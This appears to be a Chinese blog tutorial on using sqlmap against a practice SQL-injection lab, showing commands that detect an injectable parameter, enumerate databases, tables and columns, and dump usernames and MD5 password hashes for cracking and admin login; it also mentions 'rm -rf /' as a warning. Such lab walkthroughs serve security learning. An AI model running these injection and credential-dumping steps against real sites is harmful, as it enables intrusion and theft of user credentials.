sqlmap 使用笔记1
sqlmap 使用笔记1
仅供学习参考
MySQL 数据库
实战靶场链接 SQL手工注入漏洞测试(MySQL数据库)
sqlmap使用
先介绍本次使用的软件环境
图如果看不清的话可以看这里
.............. root@linux ..,;:ccc,. ---------- ......''';lxO. OS: Kali GNU/Linux Rolling x86_64
.....''''..........,:ld; Model: VMware Virtual Platform None .';;;:::;,,.x, Kernel: 4.19.0-kali4-amd64 ..'''. 0Xxoc:,. ... Uptime: 3 hours, 36 minutes .... ,ONkc;,;cokOdc',. Packages: 2874 . OMo ':ddo. Shell: bash 5.0.3 dMc :OO; Resolution: 1718x926 0M. .:o. DE: GNOME ;Wd WM: GNOME Shell ;XO, WM Theme: Kali-X ,d0Odlc;,.. Theme: Kali-X [GTK2/3] ..',;:cdOOd::,. Icons: Vibrancy-Kali [GTK2/3] .:d;.':;. Terminal: gnome-terminal 'd, .' CPU: Intel Xeon E3-1225 V2 (2) @ 3.1GHz ;l .. GPU: VMware SVGA II Adapter .o Memory: 1126MB / 1971MB c .' . root@linux:~# sqlmap_____H_____ ___["]_____ ___ ___ {1.3.4#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _||_|V... |_| http://sqlmap.orgUsage: python sqlmap [options]sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic and -hh for advanced help我使用的虚拟机平台,不建议将kali直接作为自己的日用系统.
因为kali不像其他linux发行版.kali会直接以root用户登录并执行命令.
如果哪天自己下了个未知的脚本一执行或者脑子一热执行’rm -rf /’ 的话后果不堪设想.
在命令行中打开sqlmap
直接输入并回车
sqlmap
先介绍一下常用的参数:
- ‘–flush-session’ 清空缓存
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 --flush-session
- ‘-u’ 使用注入连接
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1
- '–dbs’列举出服务器全部数据库名
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 --dbs
- ‘-D’ 选择数据库, '–tables’列举出所选择数据库的所有表
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 -D mozhe_Discuz_StormGroup --tables
- ‘-T’ 选择表 ‘–columns’ 列举出所选着表的字段信息
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 -D mozhe_Discuz_StormGroup -T StormGroup_member --columns
- ‘-C’ 选择字段(字段之间逗号隔开,不能空格.) ‘–dump’ 在命令行显示字段结果.
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 -D mozhe_Discuz_StormGroup -T StormGroup_member -C name,password --dump
选择注入点:
我这里靶场的注入点为
http://219.153.49.228:44466/new_list.php?id=1
因此,在控制台输入
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1
‘-u’ 选择注入地址
出现以下信息:
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
这是在问你这像是MySQL的数据库,是否继续测试其他数据库.说人话就是选Y它跑久些,成功率高些.(主要还是看情况)
这里节约时间选N.
然后
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
问你是否进行其他测试,选Y,回车
接下来:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
找到一个易受到攻击的地方,是否还要继续找?节约时间选N
然后出现以下信息:
从图中可以得到以下信息:
| 信息 | 结果 |
|---|---|
| 数据库类型及版本 | MySQL >=5.0.12 |
| 网页服务器类型及版本 | Nginx 1.10.3 |
| 服务器系统 | Linux Ubuntu |
到这里我们可以得知这个连接可以注入.
如果得到的不是像上图所示,可以在注入选着的时候碰碰运气.
获取服务器中的库
这里使用’–dbs’参数
命令行:
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 --dbs
得到MySQL服务器中有以下库:
| 库名 |
|---|
| information_schema |
| mozhe_Discuz_StormGroup |
| mysql |
| performance_schema |
| sys |
获取库中的表
我们这次的目标库是’mozhe_Discuz_StormGroup’,因此用到’-D’以及’–tables’参数
命令行:
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 -D mozhe_Discuz_StormGroup --tables
‘-D’ 先选着数据库, 然后 ‘–tables’ 列出所选数据库的表名
得到以下信息:
| 库名 | 表名 |
|---|---|
| mozhe_Discuz_StormGroup | StormGroup_member |
| mozhe_Discuz_StormGroup | notice |
可以看到库中只有两张表,我们先查看第一张表的信息
查看表字段信息
先看StormGroup_member表的字段信息先.
命令行:
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 -D mozhe_Discuz_StormGroup -T StormGroup_member --columns
‘-D’ 选数据库,接着 ‘-T’ 选表,最后 ‘–columns’ 列出表字段信息.
得到:
| 表 | 字段名 | 数据类型 |
|---|---|---|
| StormGroup_member | id | int(11) |
| StormGroup_member | name | varchar(20) |
| StormGroup_member | password | varchar(255) |
| StormGroup_member | status | int(11) |
查看字段内信息:
我们这次需要看看name,password和status字段信息.
命令行:
sqlmap -u http://219.153.49.228:44466/new_list.php?id=1 -D mozhe_Discuz_StormGroup -T StormGroup_member -C name,password,status --dump
首先出现:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
因为password字段是使用md5加密,所以问你是否要将md5文件放到临时文件中让别的程序解密,这里我们需要它显示md5值,所以选N
接着
do you want to crack them via a dictionary-based attack? [Y/n/q]
问你是否要用字典来破解md5,因为它的字典不强大,所以我们不需要,选N
‘-C’ 选择字段,字段之间用’,'隔开,不能空格. --dump 显示结果(貌似不止)
最后得到以下信息:
| name | password | status |
|---|---|---|
| mozhe | 356f589a7df439f6f744ff19bb8092c0 | 0 |
| mozhe | 9dccf1e08d5638026f5f5a4f01109f8e | 0 |
现在就得到用户名和密码的哈希值了,如果我们需要密码的明文,就到专门解密md5的网站上去解密
得到密码,登录后台,收工.
相比于手工注入,使用工具可以更加快捷,当然成功率也是看缘分的.
如果有哪里写的不好的地方,欢迎指出,谢谢.
sqlmap 使用笔记1相关推荐
- SQLMAP使用笔记
SQLMAP 使用笔记 --by Anton 0-请求注入检测 sqlmap可以使用基于布尔(bool).时间(time).语句是否执行 (页面返回时间是否增加).报错(err ...
- SQLmap学习笔记
SQLmap参数学习笔记 文章目录 SQLmap参数学习笔记 简介 Options - 设置 显示等级 Target - 目标 对POST请求进行注入 HTTPS检测 Request - 请求 HTT ...
- 网络安全-sqlmap学习笔记
目录 介绍 命令参数 指定目标 直连数据库 服务型数据库(前提知道数据库用户名和密码) 文件型数据库(前提知道数据库绝对路径) URL探测 文件读取目标 Google dork注入 Http参数 设置 ...
- 2.羽翼sqlmap学习笔记之MySQL注入
1.判断一个url是否存在注入点: .sqlmap.py -u "http://abcd****efg.asp?id=7" -dbs 假设找到数据库:student ------- ...
- 4.羽翼sqlmap学习笔记之Post登录框注入
4.Sqlmap系列教程--post登录框注入 注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: ...
- Sqlmap学习笔记(叁)
https://blog.werner.wiki/sqlmap-study-notes-3/ 十五.操作系统控制 1.执行任意操作系统命令 参数:–os-cmd和–os-shell 若数据库管理系统是 ...
- sqlmap指定cookie_利用SQLMap进行cookie注入
SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用 到cookie注入,一遇到cookie注入就去使用注入中转工 ...
- 网络安全-靶机dvwa之sql注入Low到High详解(含代码分析)
目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库名 获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 ...
- 《MetaSploit渗透测试魔鬼训练营》之WEB应用渗透技术
目录 口令猜测与嗅探 FTP嗅探 SSH口令猜测 开源WEB扫描工具 w3af wfuzz OWASP TOP 10 SQL注入攻击 手工注入 sqlmap XSS 参考 口令猜测与嗅探 FTP嗅探 ...
最新文章
- 如何kill同一个应用的所有进程
- sklearn—无监督最近邻
- c#接口和抽象类对比学习
- 拓扑排序(字典序最小,字典序最小)
- LeetCode 9 回文数
- select选择后生成html,Javascript - 从select中添加选择列表
- Spring Cloud原理
- 朗沃20140424
- Gson源码解析之InstanceCreator简单说明
- 计算机的字体要怎么删除,计算机安装删除字体
- c语言实验报告全,c语言实验报告
- 常用组合数计算公式及推算
- 樊登《高能量姿势》听后感
- 湖北大学计算机学院王时绘,5G来了,有湖大人的智慧!
- Sketch占满MacBook200G硬盘的解决方法
- 长城皮卡品牌CEO张昊保:皮卡是一个独特的品类,想玩门槛很高
- 提升网络营销策略的方法
- CAD“左手键”快捷命令表,大大提高绘图效率
- 七夕h5开发就找TOM小游戏
- 字符串格式化(format()使用)